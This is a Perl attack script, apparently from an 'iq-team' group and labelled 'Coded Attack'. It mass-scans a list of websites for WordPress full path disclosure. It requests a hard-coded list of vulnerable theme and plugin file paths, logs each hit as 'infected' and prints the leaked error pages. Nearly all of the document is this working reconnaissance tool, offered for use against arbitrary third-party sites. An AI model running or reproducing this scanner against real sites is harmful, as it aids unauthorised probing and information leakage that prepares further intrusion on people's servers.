wordpress full path disclosure tester iq-team.org

1. #!/usr/bin/perl
2. use HTTP::Request;
3. use LWP::UserAgent;
4. use LWP::Simple;
5. system ("cls");
6. system ("title Ful Path vul scanner ");
7. print q(
8. +---------------------------------------+
9. | Wordpress Full Path Disclosure Tester |
10. | Coded Attack |
11. | Lover PerL |
12. | Www.iq-team.org |
13. +---------------------------------------+
14. );
15.  
16. sleep (1);
17. $ARG = @ARGV;
18. ($host,$outfile) = @ARGV;
19. if(@ARGV eq 0)
20. {
21.  
22. print "\n\n[+] Enter List File Url :";
23. $host=<STDIN>;
24. chomp($host);
25. print "[+] Enter Name File To Save :";
26. $outfile=<STDIN>;
27. chomp($outfile);
28. open (SITE, "<$host") || die "[-] Can't open the List of site file !";
29. @SITE = <SITE>;
30. close SITE;
31. }
32. elsif ($ARG < 1)
33. {
34. $host = $ARGV[0];
35. $outfile = $ARGV[1];
36. }
37. else
38. {
39. exit;
40. }
41. foreach my $xp (@SITE) {
42. chomp $xp;
43. $hosts = $xp;
44. print "\n\n";
45. print "\t\t Scanning ... $hosts\n";
46. sleep(1);
47. print "\n\n";
48. @files = (
49. "/wp-content/themes/dt-chocolate/index.php",
50. "/wp-content/themes/massimo/sp-framework/sp-wp-login.php",
51. "/wp-content/themes/eggo/sp-framework/sp-wp-login.php",
52. "/wp-content/plugins/wp-codebox/wp-codebox.php?p=1&download=./",
53. "/wp-content/themes/slash/index.php",
54. "/wp-content/plugins/vote-it-up/voteitup.php",
55. "/wp-content/plugins/wp-polls/polls-templates.php",
56. "/wp-content/plugins/ultimate-security-check/wp-ultimate-security.php",
57. "/wp-content/plugins/dynamic-headers/custom-header.php",
58. "/wp-content/plugins/haiku-minimalist-audio-player/haiku-player.php",
59. "/wp-content/plugins/wp-newsletter-simples/tl-newslleter.php",
60. "/wp-content/plugins/wp-events/wp-events.php",
61. "/wp-content/plugins/wp-super-cache/wp-cache.php",
62. "/wp-content/plugins/admin-menu-editor/menu-editor.php",
63. "/wp-content/plugins/wp-photo-album/wppa.php",
64. "/wp-content/plugins/wordpress-multibox-plugin/multibox.php",
65. "/wp-content/plugins/superslider-show/superslider-show.php",
66. "/wp-content/themes/sahifa/category.php",
67. "/wp-content/themes/moneymasters/index.php",
68. "/wp-content/plugins/sitepress-multilingual-cms/sitepress.php",
69. "/wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/uploads/",);
70. foreach $vul(@files){
71. $url = $hosts.$vul;
72. $request = HTTP::Request->new(GET=>$url);
73. $useragent = LWP::UserAgent->new();
74.  
75. $response = $useragent->request($request);
76. if ($response->is_success){
77. print "The $url is infected\n";
78. open(TN,">>$outfile");
79. print TN "$url\n";
80. close(TN);
81. print "\n\n[*] Do you want to see The Result [Y/N] : ";
82. $answer=<STDIN>;
83. chomp($answer);
84. print "+-----------------------------------------------------+\n";
85. if (lc($answer) eq "y")
86. {
87. print $response->content;
88. print "\n\n[*] Find your path easly ;) ";
89.  
90. }
91. else
92. {
93. print "\n[-] Ok as you like good bye :) !! \n\n";
94. }
95. }
96. }
97. }